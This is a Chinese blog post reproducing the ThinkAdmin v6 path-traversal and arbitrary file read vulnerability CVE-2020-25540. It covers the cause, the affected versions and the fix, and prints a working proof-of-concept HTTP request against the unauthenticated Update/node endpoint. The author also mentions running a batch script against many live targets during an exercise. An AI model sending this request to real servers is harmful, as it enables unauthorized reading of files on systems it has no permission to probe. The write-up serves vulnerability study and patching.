Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现

v2-bd10a8a3fac97bbdfff234ba9fc1066c_b.jpg


Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现

快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞

一、漏洞简介:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

二、漏洞成因:

github.com/zoujingli/Th

Update.php中的函数方法未授权,可直接函数可直接调用。导致漏洞

三、影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞复现:

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22​rules=%5B%22.%2F%22%5D

简单写了一个批量的小脚本


v2-79de99708e9dd61985d9fda2900ca866_b.png


跑了一部分,成功的不多,HVV尾声了,情况也正常。


v2-453706602f0ad9a34a3d79d02d0649af_b.jpg


发现一个诡异的地方:burp直接放包不能成功回去json的返回数据


v2-9e3f6d250f3ff5d8fd445942f79b7300_b.jpg


python-尝试python的request的post方法可以返回


v2-f2410a45d9374ccde5bda6d7c222d6c1_b.jpg


尝试curl的post的方法可以正常返回数据


v2-6b093c0c44a19df2eaa93ffedbb1423e_b.jpg


下来再来研究这个问题。

五、修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本

六、参考链接:

github.com/zoujingli/Th

mp.weixin.qq.com/s/1tm8

cnblogs.com/fan-gx/p/12

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

个人CSDN:blog.csdn.net/qq_376027

原文连接:mp.weixin.qq.com/s/Gr5y


v2-e0038f5515df1ac5006bb633bd45db6e_b.jpg

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值